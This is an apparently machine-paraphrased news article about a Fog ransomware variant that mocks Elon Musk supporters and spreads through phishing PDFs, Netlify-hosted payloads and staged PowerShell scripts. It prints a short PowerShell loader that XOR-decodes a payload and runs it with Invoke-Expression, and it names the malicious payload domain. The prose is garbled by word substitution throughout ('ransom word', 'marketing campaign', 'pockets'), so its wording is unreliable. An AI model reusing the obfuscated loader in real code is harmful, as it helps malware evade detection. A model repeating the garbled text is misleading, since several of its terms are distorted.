A classy ransomware marketing campaign particularly focusing on and mocking supporters of Elon Musk has been recognized by cybersecurity specialists.
The assault, recognized as a variant of Fog Ransomware, employs multi-stage PowerShell scripts and Netlify-hosted payloads to execute its malicious code.
This marketing campaign represents a regarding evolution in politically-themed malware that mixes monetary motivation with satirical commentary.
The ransomware distinguishes itself by means of its uncommon ransom word, which impersonates a person named “Edward Coristine” allegedly related to DOGE cryptocurrency.
Ransom Observe (Supply – X)
In a weird twist, the word lists authorities electronic mail addresses as technical help contacts and accommodates satirical content material directed at Musk supporters.
Upon execution, the malware launches a YouTube video mocking Elon Musk, serving each as a distraction approach and reinforcement of its parodical nature.
KrakenLabs researchers recognized the marketing campaign after tracing a collection of infections again to phishing emails containing PDF attachments with deceptive “Pay Adjustment” titles.
The assault employs a complicated chain involving .lnk file droppers and a number of levels of PowerShell execution, demonstrating a mix of technical prowess and psychological manipulation focusing on particular teams.
The whole an infection chain entails a number of elements working in live performance. The preliminary compromise begins with a phishing PDF that hyperlinks to a Netlify-hosted ZIP archive, which then deploys a sequence of PowerShell scripts starting with “Pay.ps1” that orchestrates the assault.
The core payload consists of “cwiper.exe” (the precise ransomware part), “ktool.exe” (using Intel BYOVD approach for kernel-level entry), and specialised PowerShell scripts for reconnaissance.
Regardless of its satirical presentation, the presence of a Monero cryptocurrency pockets confirms the assault’s monetary motivation beneath its trolling veneer.
This dual-purpose approach-financial achieve masked by political mockery-represents an rising development in ransomware techniques that try to obscure felony intent behind ideological facades.
An infection Mechanism Particulars
The an infection begins when victims open a phishing PDF purportedly containing pay adjustment data.
Malicious PDF (Supply – X)
This doc hyperlinks to a Netlify-hosted area (hilarious-trifle-d9182e.netlify.app) the place malicious payloads are saved.
The preliminary PowerShell script (“Pay.ps1”) acts because the first-stage loader, which downloads and executes “stage1.ps1”-the major orchestration part.
This script is chargeable for deploying the remaining modules and establishing persistence.
# Simplified illustration of the obfuscation technique utilized in trackerjacker.ps1
$encoded = “XOR-obfuscated payload knowledge”
$key = “KrakenObserved2025”
$decoded = for($i=0; $i -lt $encoded. Size; $i++) {
$encoded[$i] -bxor $key[$i % $key. Length]
}
Invoke-Expression([System.Text.Encoding]::ASCII.GetString($decoded))
Essentially the most technically subtle part is “trackerjacker.ps1,” which employs XOR-based obfuscation to evade detection.
After deobfuscation, this script performs system reconnaissance whereas “lootsubmit.ps1” leverages the Wigle API for geolocation knowledge gathering.
Along with “cwiper.exe,” which performs the precise encryption, and “ktool.exe,” which offers kernel-level entry by means of legit Intel drivers, this assault demonstrates a regarding degree of technical sophistication behind its satirical facade.
How SOC Groups Save Time and Effort with ANY.RUN – Dwell webinar for SOC groups and managers
